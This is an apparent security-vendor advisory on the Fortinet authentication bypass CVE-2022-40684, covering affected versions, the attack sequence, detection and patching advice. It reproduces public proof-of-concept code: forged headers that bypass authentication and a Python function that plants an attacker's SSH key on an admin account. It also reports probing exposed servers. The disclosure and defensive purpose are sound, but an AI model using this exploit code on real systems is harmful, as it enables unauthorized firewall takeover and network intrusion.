On October 7, 2022, less than a month after the ProxyNotShell attack that used Microsoft Exchange Server zero-day vulnerability, a Fortinet authentication bypass vulnerability, CVE-2022-40684, was discovered. This vulnerability is being exploited in Fortigate, Fortiproxy, and Fortiswitch Manager among Fortinet products and is particularly found in Firmware 7.x version products.
This article analyzes the authentication bypass vulnerability of Fortinet, which is used by 565,000 customers worldwide along with Palo Alto Networks, and explains how you can check for Fortinet products that are exposed on the internet.
CVE-2022-40684 Fortinet Authentication Bypass Vulnerability Latest Updates
The authentication bypass vulnerability was disclosed to customers on October 7, 2022. It was soon known to everyone else through several reports. On October 10, 2022, a list of all affected Fortinet products and solutions was released to everyone.
Vulnerable Products
Fortinet FortiOS Version 7.2.0 ~ 7.2.1 and 7.0.0 ~ 7.0.6, Fortinet FortiProxy Version 7.2.0 ~ 7.0.6 and FortiSwitch Manager Version 7.2.0 and 7.0.0
- FortiOS: version 5.x, 6.x are not affected
According to the announcement, hackers were able to gain information about user, user’s public ssh-key, trusthostzone band IP, fortitoken, serial number, FortiOS and more through HTTP/HTTPS requests of the version of products. In addition to the attack, they can also access the product’s CLI by sending the RSA key to the server and hijacking the admin user’s ssh key. If they succeed in doing so, they can penetrate the internal network as they have the power to manipulate the management interface.
Order of Attack
- Modify the admin user’s SSH key to their own key so they can log in when they acquire a vulnerable server
- Add local user
- Access interface and update networking configurations
- Leak other confidential system information through packet capture and interface management pages
Fortinet said to verify systems immediately. If the ‘user= “Local_Process_Access”’ log is found among the logs, it is recommended to patch and take action immediately.
Detect Vulnerable Fortinet Using PoC Code
You can find vulnerable Fortinet servers by making an HTTP/HTTPS request on ‘api/v2/cmdb/system/admin’ and checking if the system information has been leaked.
Deliver the header below to bypass authentication.
CVE-2022-40684 PoC Code: https://github.com/carlosevieira/CVE-2022-40684
headers = {
"user-agent": "Node.js",
"accept-encoding": "gzip, deflate",
"Host": "127.0.0.1:9980",
"forwarded": 'by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=',
"x-forwarded-vdom": "root",
}If you find a vulnerable server, you can gain access by bypassing ssh authentication by delivering the key in the header to the vulnerable server.
CVE-2022-40684 PoC Code: https://github.com/horizon3ai/CVE-2022-40684
def add_key(target, username, key_file):
key = format_key(key_file)
j = {
"ssh-public-key1": '\"' + key + '\"'
}
url = f'https://{target}/api/v2/cmdb/system/admin/{username}'
r = requests.put(url, headers=HEADERS, json=j, verify=False)
if 'SSH key is good' not in r.text:
print(f'[-] {target} is not vulnerable!')
else:
print(f'[+] SSH key for {username} added successfully!')You can confirm whether the server is vulnerable by making an HTTP/HTTPS request to an open Fortinet IP address using the PoC code.
Operating Fortinet Firewall Neglected, Immediate Inspections Are Needed
We checked the vulnerabilities of certain Fortinet IPs exposed on the internet through the released PoC.
The image below shows that the vulnerable server exposes the username, user’s privileges (read-only, super_admin), and the SSH public key.
The vulnerable firmware version is the 7.2.0 version, so we know that the product Fortigate 100E is being used.
As we can see below, the admin’s SSH public key is listed as a fake-key. From this, we can assume that this is a server affected by the Fortinet authentication bypass vulnerability.
If you search for the server’s IP address on Criminal IP Asset Search, you can see that it is an IP address owned by Microsoft. (as_name: MICROSOFT-CORP-MSN-AS-BLOCK)
CVE-2022-40684 Fortinet Authentication Bypass Vulnerability Security Check
CVE-2022-40684 Fortinet authentication bypass vulnerability received a CVSS v3 score of 9.8. Despite Fortinet’s vulnerability patch recommendations, there are still many servers around the world that are operating a vulnerable firewall.
This vulnerability can access firewall CLI through authentication bypass. Therefore, not only is it dangerous for operating external servers but also for servers operating internally. It is highly recommended and considered important to conduct security updates. If the OS version update is difficult, limit IP access to the HTTP/HTTPS interface or deactivate it.
Check out our article that discusses how to detect and analyze exposed servers by Microsoft Exchange Zero-Day Vulnerability.
Source : Criminal IP (https://www.criminalip.io)
Releated Article :
[…] out this article on Fortinet Authentication Vulnerability for relevant […]
[…] CVE-2022-40684: Fortinet Authentication Vulnerability That Threatens Fortinet Users […]